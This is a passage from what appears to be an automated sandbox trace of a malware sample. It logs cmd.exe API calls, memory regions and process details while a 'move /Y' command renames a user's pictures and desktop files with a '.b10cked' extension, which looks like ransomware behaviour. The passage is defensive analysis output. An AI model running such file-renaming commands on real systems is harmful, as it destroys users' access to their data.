(_String1="move", _String2="TIME") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.787] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.787] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.787] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.787] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.787] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.787] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.787] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.787] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.789] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.790] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2=".") returned 63 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2="..") returned 63 [0141.790] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.790] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.790] SetErrorMode (uMode=0x0) returned 0x0 [0141.790] SetErrorMode (uMode=0x1) returned 0x0 [0141.790] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20eb14, lpFilePart=0x20eafc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x20eafc*="m41m.jpg") returned 0x21 [0141.790] SetErrorMode (uMode=0x0) returned 0x1 [0141.790] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2=".") returned 63 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2="..") returned 63 [0141.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.791] SetErrorMode (uMode=0x0) returned 0x0 [0141.791] SetErrorMode (uMode=0x1) returned 0x0 [0141.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20ef90, lpFilePart=0x20ed28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x20ed28*="m41m.jpg") returned 0x21 [0141.791] SetErrorMode (uMode=0x0) returned 0x1 [0141.791] SetErrorMode (uMode=0x0) returned 0x0 [0141.791] SetErrorMode (uMode=0x1) returned 0x0 [0141.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x20f198, lpFilePart=0x20ed28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", lpFilePart=0x20ed28*="m41m.jpg.b10cked") returned 0x29 [0141.791] SetErrorMode (uMode=0x0) returned 0x1 [0141.791] SetLastError (dwErrCode=0x0) [0141.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg.b10cked")) returned 0xffffffff [0141.791] GetLastError () returned 0x2 [0141.791] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", fInfoLevelId=0x1, lpFindFileData=0x20e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e6a4) returned 0x232198 [0141.791] FindNextFileW (in: hFindFile=0x232198, lpFindFileData=0x20e6a4 | out: lpFindFileData=0x20e6a4) returned 0 [0141.792] GetLastError () returned 0x12 [0141.792] FindClose (in: hFindFile=0x232198 | out: hFindFile=0x232198) returned 1 [0141.792] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", fInfoLevelId=0x1, lpFindFileData=0x231ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231ac8) returned 0x232198 [0141.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x20e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", lpFilePart=0x0) returned 0x29 [0141.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x0) returned 0x21 [0141.793] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.793] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg.b10cked"), dwFlags=0x3) returned 1 [0141.793] FindClose (in: hFindFile=0x232198 | out: hFindFile=0x232198) returned 1 [0141.793] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8f0 | out: _Buffer=" 1") returned 9 [0141.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.793] GetFileType (hFile=0x7) returned 0x2 [0142.274] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e87c | out: lpMode=0x20e87c) returned 1 [0142.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.275] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e8b0 | out: lpConsoleScreenBufferInfo=0x20e8b0) returned 1 [0142.275] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.275] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8f0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.275] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e8d4*=0x1a) returned 1 [0142.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.275] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.276] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.276] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.276] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.276] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.276] SetConsoleInputExeNameW () returned 0x1 [0142.276] GetConsoleOutputCP () returned 0x1b5 [0142.276] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.276] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.276] exit (_Code=0) Process: id = "179" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15130 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15131 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15132 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15133 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 15134 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15135 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15136 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15137 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15138 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 15139 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15974 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15975 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15976 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15977 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 15978 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15979 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15980 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15981 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15982 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15983 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15984 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15985 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15986 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15987 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15988 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 15989 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15990 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15993 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15995 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 15996 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15997 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 236 os_tid = 0xefc [0141.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd2c | out: lpSystemTimeAsFileTime=0x22fd2c*(dwLowDateTime=0x8e4eb300, dwHighDateTime=0x1d440a9)) [0141.555] GetCurrentProcessId () returned 0xfa4 [0141.555] GetCurrentThreadId () returned 0xefc [0141.555] GetTickCount () returned 0x2c5dd [0141.555] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd24 | out: lpPerformanceCount=0x22fd24*=19834457994) returned 1 [0141.556] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.556] __set_app_type (_Type=0x1) [0141.556] __p__fmode () returned 0x76b331f4 [0141.556] __p__commode () returned 0x76b331fc [0141.556] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.556] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.556] GetCurrentThreadId () returned 0xefc [0141.556] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xefc) returned 0x38 [0141.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.556] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.556] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fcbc | out: phkResult=0x22fcbc*=0x0) returned 0x2 [0141.557] VirtualQuery (in: lpAddress=0x22fcf3, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.557] GetConsoleOutputCP () returned 0x1b5 [0141.557] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.557] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.558] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.558] GetEnvironmentStringsW () returned 0x330178* [0141.558] FreeEnvironmentStringsW (penv=0x330178) returned 1 [0141.558] GetEnvironmentStringsW () returned 0x330178* [0141.558] FreeEnvironmentStringsW (penv=0x330178) returned 1 [0141.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec2c | out: phkResult=0x22ec2c*=0x40) returned 0x0 [0141.558] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0xa0, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.558] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x0, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegCloseKey (hKey=0x40) returned 0x0 [0141.559] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec2c | out: phkResult=0x22ec2c*=0x40) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x0, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegCloseKey (hKey=0x40) returned 0x0 [0141.559] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.559] srand (_Seed=0x5b886370) [0141.559] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" 